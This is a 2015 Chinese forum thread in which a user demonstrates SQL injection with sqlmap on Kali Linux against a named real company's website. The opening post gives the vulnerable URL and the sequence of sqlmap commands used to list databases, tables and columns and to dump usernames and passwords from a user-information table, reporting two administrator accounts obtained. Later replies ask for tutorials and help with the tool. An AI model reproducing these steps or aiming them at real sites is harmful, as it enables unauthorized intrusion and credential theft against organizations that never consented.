小沫 发表于 2015-3-8 12:10:06

(小白,大牛勿喷!)kali linux下sqlmap的简单检测

kali linux下sqlmap的简单检测

不shall不提权,就是简单的注入测试。

目标网址:http://www.cqyuhe.com/(重庆渝和实业有限公司)

注入点:http://www.cqyuhe.com/news_view.php?id=4


打开sqlmap输入sqlmap -u "http://www.cqyuhe.com/news_view.php?id=4" –dbs



爆出两个表名

选择a0617152856
爆破表名

sqlmap -u "http://www.cqyuhe.com/news_view.php?id=4" -D a0617152856 –tables

得出


接下来选择userinfo(用户信息)进行爆破列名
sqlmap -u "http://www.cqyuhe.com/news_view.php?id=4" -D a0617152856 -T userinfo –columns
得出



然后选择username和userpwd进行猜解内容

sqlmap -u "http://www.cqyuhe.com/news_view.php?id=4" --dump -Da0617152856 -T userinfo -C username,userpwd

最后得出



两个管理员账户和密码

比较简单,大牛请放过我

战神-保家卫国 发表于 2015-3-8 12:50:17

小白,完全看不懂,哎

小沫 发表于 2015-3-8 13:10:27

战神-保家卫国 发表于 2015-3-8 12:50
小白,完全看不懂,哎

额   其实跟手工注入差不多   首先是暴库,然后选择数据库爆表名,得出表名再爆表名就得出表下面的列名了,然后根据自己需要对列名进行猜解。

战神-保家卫国 发表于 2015-3-8 13:50:31

战神-保家卫国 发表于 2015-3-8 12:50
小白,完全看不懂,哎

对不起哈,我是小白,一点点都不懂的小白,请问,有什么具体的教程吗

小沫 发表于 2015-3-8 14:03:22

战神-保家卫国 发表于 2015-3-8 13:50
对不起哈,我是小白,一点点都不懂的小白,请问,有什么具体的教程吗

教程我以前有   现在没有了   

战神-保家卫国 发表于 2015-3-8 14:10:30

小沫 发表于 2015-3-8 14:03
教程我以前有   现在没有了

好吧,还是谢谢大神提供教程,我还是需要并且能看懂的时候再来吧

conosc 发表于 2015-5-10 14:10:02

楼主能发下这类相关的学习资源么。。。最好是有整套的,,,我找到的都是些以前的,如阿d,明小子类的。。。{:soso_e154:}

孤独患者 发表于 2015-5-10 16:30:00

战神-保家卫国 发表于 2015-3-8 13:50
对不起哈,我是小白,一点点都不懂的小白,请问,有什么具体的教程吗

百度搜索sqlmap使用笔记,很多结果。 sqlmap不只是linux能用,也有windows版的。

孤独患者 发表于 2015-5-10 16:34:11

conosc 发表于 2015-5-10 14:10
楼主能发下这类相关的学习资源么。。。最好是有整套的,,,我找到的都是些以前的,如阿d,明小子类的。。 ...

这类注入工具的使用方法都是大同小异的,都是爆库爆表爆列爆字,只不过一个是图形界面一个是字符界面。linux的工具想知道它都有什么功能只要输入工具名+空格+-help 就出来了。比windows工具方便多了。

conosc 发表于 2015-5-10 18:44:12

孤独患者 发表于 2015-5-10 16:34
这类注入工具的使用方法都是大同小异的,都是爆库爆表爆列爆字,只不过一个是图形界面一个是字符界面。li ...

能问下么,是我代码敲错了还是???怎么用sqlmap就找不到这表,之后读取字段也读取不到。。。不知是那的问题,,,
用啊d就给扫出来了,郁闷啊。。。。



页: [1]
查看完整版本: (小白,大牛勿喷!)kali linux下sqlmap的简单检测